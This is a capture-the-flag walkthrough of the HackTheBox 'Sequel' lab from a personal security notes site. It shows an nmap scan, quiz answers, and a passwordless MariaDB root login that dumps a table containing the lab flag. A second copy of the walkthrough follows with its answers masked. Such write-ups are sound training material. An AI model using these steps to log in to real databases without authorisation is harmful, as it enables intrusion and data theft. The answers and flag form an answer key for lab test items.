🕸️
Th4ntis CyberSec
  • 🕷️>whoami_
  • 🖥️General Info
    • CyberSec News
    • Getting Started and other Resources
      • CompTIA Certs
        • Security+
        • Pentest+
    • MITRE ATT&CK
    • Cyber Kill Chain
    • Docker
  • 💻Networking
    • General Networking
    • Common Ports and Protocols
    • TCP/IP Model
    • OSI Model
    • Subnetting
    • Wireshark
    • NMap
    • Wireless
      • Wardriving/WiFi Sniffing
    • 3-Way Handshake
  • 🐧Linux
    • Common commands
    • Sudo
    • Files and File contents
    • Sed Awk and Grep
    • Permissions
  • 🪟Windows
    • Event Codes
    • Powershell
    • Internals
    • Active Directory
  • 🔎OSINT
    • OSINT Tools
    • IP/Domain OSINT
    • Email/Username OSINT
    • URL OSINT and Sandboxing
    • Social Media OSINT
    • Website OSINT
    • Password OSINT
    • Physical Location OSINT
    • Image OSINT
    • People OSINT
    • Phone Number OSINT
    • Shodan
    • Google Dorking
  • 🛠️Tools
    • Brute Force
      • Hydra
    • Credential Dumping
      • Mimikatz
    • Enumeration
      • Bloodhound
      • Certipy
      • Dirb/Dirbuster
      • Enum4Linux
      • GoBuster
    • Exploitation Framework
      • Metasploit
      • Sliver
      • Cobalt Strike
    • Hash Cracking
      • Hashcat
      • JohnTheRipper
    • Methods
      • Powershell Obfuscation
      • Privilege Escalation
      • Pass-The-Hash
      • Kerberos and Kerberoasting
    • Vulnerability Scanners
      • Nessus
      • OpenVAS
    • Web App
      • BurpSuite
      • OWASP Zap
    • Wireless
      • Aircrack-ng
      • Kismet
      • Bettercap
      • HCXDumptool
      • Wifite
    • Impacket
    • Social-Engineer Toolkit (SET)
  • 📔Guides and How-To's
    • Lab Setup
      • Ubuntu VM
      • Kali VM
      • Windows User VM
      • Windows Server VM
    • Wardriving
      • Pwnagotchi
    • Wireless Pentesting
      • WiFi Pineapple Basics
      • Evil-Twin Attack
    • Over The Wire
      • Bandit
      • Natas
      • Leviathan
      • Krypton
      • Narnia
      • Behemoth
      • Utumno
      • Maze
      • Vortex
      • Manpage
    • Docker and Kali Linux
    • Staying Private and goin Dark Online
  • 📕Quick References
    • Tools
      • Tmux
      • NMap
      • Ffuf
      • NetExec
      • CrackMapExec
      • Proxychains
      • OneDriveUser Enum
      • Hashcat
    • One-liners
    • Reverse Shells
    • Post Exploitation
    • Enumeration
      • Google
      • Sublist3r
      • NMap
      • DNSDumpster
    • Hashcracking
    • Wireless
  • 📓Courses
    • PNPT
      • Practical Ethical Hacking
      • Windows Privilege Escalation
      • Linux Privilege Escalation
      • OSINT Fundamentals
      • External Pentest Playbook
  • ☁️TryHackMe
    • Attacking Kerberos
    • Hacking with Powershell
    • Powershell for Pentesters
    • Linux PrivEsc
    • Windows PrivEsc
    • Blue
    • Kenobi
  • 📦HackTheBox
    • Starting Point
      • Tier 0
        • Meow
        • Fawn
        • Dancing
        • Redeemer
        • Explosion
        • Preignition
        • Mongod
        • Synced
      • Tier 1
        • Appointment
        • Sequel
        • Crocodile
        • Responder
        • Three
        • Ignition
        • Bike
        • Funnel
        • Pennyworth
        • Tactics
      • Tier 2
        • Archetype
        • Oopsie
        • Vaccine
        • Unified
        • Included
        • Markup
        • Base
    • Walkthroughs
      • Lame
      • Analytics
      • Manager
      • Codify
Powered by GitBook
On this page
  • Initial Scan
  • Task 1
  • Task 2
  • Task 3
  • Task 4
  • Task 5
  • Task 6
  • Task 7
  • Task 8
  • Initial Scan
  • Task 1
  • Task 2
  • Task 3
  • Task 4
  • Task 5
  • Task 6
  • Task 7
  • Task 8
Edit on GitHub
  1. HackTheBox
  2. Starting Point
  3. Tier 1

Sequel

Initial Scan

nmap -sT -sV -T4 -A -v 10.129.19.38 
Starting Nmap 7.80 ( https://nmap.org ) at 2022-08-10 17:15 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:15
Completed NSE at 17:15, 0.00s elapsed
Initiating NSE at 17:15
Completed NSE at 17:15, 0.00s elapsed
Initiating NSE at 17:15
Completed NSE at 17:15, 0.00s elapsed
Initiating Ping Scan at 17:15
Scanning 10.129.19.38 [2 ports]
Completed Ping Scan at 17:15, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:15
Completed Parallel DNS resolution of 1 host. at 17:15, 0.08s elapsed
Initiating Connect Scan at 17:15
Scanning 10.129.19.38 [1000 ports]
Discovered open port 3306/tcp on 10.129.19.38
Completed Connect Scan at 17:15, 0.81s elapsed (1000 total ports)
Initiating Service scan at 17:15
Scanning 1 service on 10.129.19.38
Completed Service scan at 17:17, 157.53s elapsed (1 service on 1 host)
NSE: Script scanning 10.129.19.38.
Initiating NSE at 17:17
Completed NSE at 17:18, 20.11s elapsed
Initiating NSE at 17:18
Completed NSE at 17:18, 1.06s elapsed
Initiating NSE at 17:18
Completed NSE at 17:18, 0.00s elapsed
Nmap scan report for 10.129.19.38
Host is up (0.052s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE VERSION
3306/tcp open  mysql?
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Thread ID: 128
|   Capabilities flags: 63486
|   Some Capabilities: Support41Auth, Speaks41ProtocolOld, Speaks41ProtocolNew, LongColumnFlag, IgnoreSigpipes, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, SupportsTransactions, ConnectWithDatabase, SupportsCompression, InteractiveClient, IgnoreSpaceBeforeParenthesis, FoundRows, ODBCClient, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: aNCEn{?ipx-pp`q6W7KS
|_  Auth Plugin Name: mysql_native_password

NSE: Script Post-scanning.
Initiating NSE at 17:18
Completed NSE at 17:18, 0.00s elapsed
Initiating NSE at 17:18
Completed NSE at 17:18, 0.00s elapsed
Initiating NSE at 17:18
Completed NSE at 17:18, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.92 seconds

Task 1

What does the acronym SQL stand for?

Previous rooms and general knowledge

Answer: Structured Query Language

Task 2

During our scan, which port running mysql do we find?

Found in initial scan

Answer: 3306

Task 3

What community-developed MySQL version is the target running?

Found in initial scan

Answer: MariaDB

Task 4

What switch do we need to use in order to specify a login username for the MySQL service?

mysql --help

mysql --help | grep user    
  -u, --user=name     User for login if not current user.
user                                      (No default value)

Answer: -u

Task 5

Which username allows us to log into MariaDB without providing a password?

Google'd for this answer

Using unix_socket means that if you are the system root user, you can login as root@locahost without a password. This technique was pioneered by Otto Kekäläinen in Debian MariaDB packages and has been successfully used in Debian since as early as MariaDB 10.0.

Answer: root

Task 6

What symbol can we use to specify within the query that we want to display everything inside a table?

The typical common symbol that's used mean "everything", the asterisk/wildcard.

Answer: *

Task 7

What symbol do we need to end each query with?

Looking at SQL examples, we see queries ending with a semi-colon (;)

use users_database;

Answer: ;

Task 8

Submit root flag

/mysql -h 10.129.19.38 -u root
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 132
Server version: 5.5.5-10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2022, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.05 sec)

mysql> use htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
2 rows in set (0.05 sec)

mysql> select * from config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
+----+-----------------------+----------------------------------+
7 rows in set (0.05 sec)

mysql>

Answer: 7b4bec00d1a39e3dd4e021ec3d915da8

Initial Scan

nmap -sT -sV -T4 -A -v 10.129.19.38 
Starting Nmap 7.80 ( https://nmap.org ) at 2022-08-10 17:15 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:15
Completed NSE at 17:15, 0.00s elapsed
Initiating NSE at 17:15
Completed NSE at 17:15, 0.00s elapsed
Initiating NSE at 17:15
Completed NSE at 17:15, 0.00s elapsed
Initiating Ping Scan at 17:15
Scanning 10.129.19.38 [2 ports]
Completed Ping Scan at 17:15, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:15
Completed Parallel DNS resolution of 1 host. at 17:15, 0.08s elapsed
Initiating Connect Scan at 17:15
Scanning 10.129.19.38 [1000 ports]
Discovered open port 3306/tcp on 10.129.19.38
Completed Connect Scan at 17:15, 0.81s elapsed (1000 total ports)
Initiating Service scan at 17:15
Scanning 1 service on 10.129.19.38
Completed Service scan at 17:17, 157.53s elapsed (1 service on 1 host)
NSE: Script scanning 10.129.19.38.
Initiating NSE at 17:17
Completed NSE at 17:18, 20.11s elapsed
Initiating NSE at 17:18
Completed NSE at 17:18, 1.06s elapsed
Initiating NSE at 17:18
Completed NSE at 17:18, 0.00s elapsed
Nmap scan report for 10.129.19.38
Host is up (0.052s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE VERSION
3306/tcp open  mysql?
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Thread ID: 128
|   Capabilities flags: 63486
|   Some Capabilities: Support41Auth, Speaks41ProtocolOld, Speaks41ProtocolNew, LongColumnFlag, IgnoreSigpipes, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, SupportsTransactions, ConnectWithDatabase, SupportsCompression, InteractiveClient, IgnoreSpaceBeforeParenthesis, FoundRows, ODBCClient, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: aNCEn{?ipx-pp`q6W7KS
|_  Auth Plugin Name: mysql_native_password

NSE: Script Post-scanning.
Initiating NSE at 17:18
Completed NSE at 17:18, 0.00s elapsed
Initiating NSE at 17:18
Completed NSE at 17:18, 0.00s elapsed
Initiating NSE at 17:18
Completed NSE at 17:18, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.92 seconds

Task 1

What does the acronym SQL stand for?

Previous rooms and general knowledge

Answer: Structured Query Language

Task 2

During our scan, which port running mysql do we find?

X Answer: XXX

Task 3

What community-developed MySQL version is the target running?

X Answer: XXX

Task 4

What switch do we need to use in order to specify a login username for the MySQL service?

X Answer: XXX

Task 5

Which username allows us to log into MariaDB without providing a password?

X Answer: XXX

Task 6

What symbol can we use to specify within the query that we want to display everything inside a table?

X Answer: XXX

Task 7

What symbol do we need to end each query with?

X Answer: XXX

Task 8

Submit root flag

X Answer: XXX

Last updated 2 years ago

📦